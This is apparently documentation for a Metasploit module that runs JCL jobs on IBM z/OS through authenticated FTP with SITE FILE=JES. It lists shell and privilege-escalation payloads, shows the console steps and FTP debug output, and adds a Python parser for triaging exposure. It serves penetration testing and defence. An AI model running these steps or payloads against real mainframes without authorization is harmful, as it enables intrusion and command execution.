z/OS JCL authorized FTP-based command execution - hints & tips
In order to use this exploit, you must have valid credentials on the target z/OS system, and those credentials must be permitted to upload files via FTP. If in doubt, run the exploit's check function.
Vulnerable Application
This exploit was tested against the FTP daemons of z/OS versions 1.13 and 2.1.
Payloads
If the exploit works, any JCL the user has rights to submit can be submitted.
See the cmd-type payloads under mainframe with jcl in the payload name, e.g.:
msf exploit(ftp_jcl_creds) > show payloads
Compatible Payloads
===================
Name                               Disclosure Date  Rank    Description
----                               ---------------  ----    -----------
cmd/mainframe/apf_privesc_jcl                       normal  JCL to escalate privileges via APF LIB
cmd/mainframe/bind_shell_jcl                        normal  Z/OS (MVS) Command Shell, Bind TCP
cmd/mainframe/generic_jcl                           normal  Generic JCL Test for Mainframe Exploits
cmd/mainframe/reverse_shell_jcl                     normal  Z/OS (MVS) Command Shell, Reverse TCP
Verification Steps
A successful check of the exploit will look like this:
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Platform: Mainframe
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-05-12
Available targets:
Id  Name
--  ----
0   auto
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
FTPPASS  password         no        The password for the specified username
FTPUSER  ftptest          no        The username to authenticate as
RHOST    10.10.10.1       yes       The target address
RPORT    21               yes       The target port
SLEEP    5                no        Time to wait before checking if job has completed.
Payload information:
Description:
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
valid credentials on the target system
msf exploit(ftp_jcl_creds) > check
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
Debugging
If the exploit or check is not working, enable the VERBOSE and FTPDEBUG options of the exploit and run it again. On a vulnerable system the output should look similar to the following.
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
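The check above decides exposure from three observations in the transcript: a 220 banner identifying IBM FTP, a 230 reply confirming the login, and a 200 reply to SITE FILE=JES. The following Python is an added example, not code from the module or this page, that applies the same decision to a saved FTPDEBUG transcript so check output collected from many hosts can be triaged offline; the sample transcript is constructed from the lines shown above, and the host name ZOS.EXAMPLE.COM is an assumption.

```python
import re

# Constructed sample in the FTPDEBUG format shown on this page
# (the host name ZOS.EXAMPLE.COM is an assumption, not a real system).
SAMPLE_TRANSCRIPT = r'''[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
'''

LINE_RE = re.compile(r'FTP (send|recv): "(.*)"\s*$')

def parse_transcript(text):
    """Return (direction, line) pairs, one per wire line; a recv entry may
    hold a multi-line reply ('220-' continuations then the final '220 ')."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if not m:
            continue
        direction, body = m.groups()
        body = body.replace('\\"', '"')       # undo the debug printer's escaping
        for line in body.split('\\r\\n'):     # escaped CRLF separates wire lines
            if line:
                events.append((direction, line))
    return events

def assess_jes_exposure(text):
    """Apply the module's check decision to a captured transcript."""
    result = {"zos_banner": False, "logged_in": False, "jes_mode_accepted": False}
    last_sent = ""
    for direction, line in parse_transcript(text):
        if direction == "send":
            last_sent = line.strip().lower()
            continue
        code = int(line[:3]) if line[:3].isdigit() else 0
        if code == 220 and "IBM FTP" in line:        # z/OS FTP banner
            result["zos_banner"] = True
        elif code == 230:                            # credentials accepted
            result["logged_in"] = True
        elif code == 200 and last_sent == "site file=jes":
            result["jes_mode_accepted"] = True       # JES submission mode enabled
    result["exposed"] = all(result.values())
    return result
```

A host whose FTP server rejects SITE FILE=JES (any reply other than 200) is reported as not exposed even when the banner and login match.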
Notes
Running the job leaves a job log in JES under the credentials used.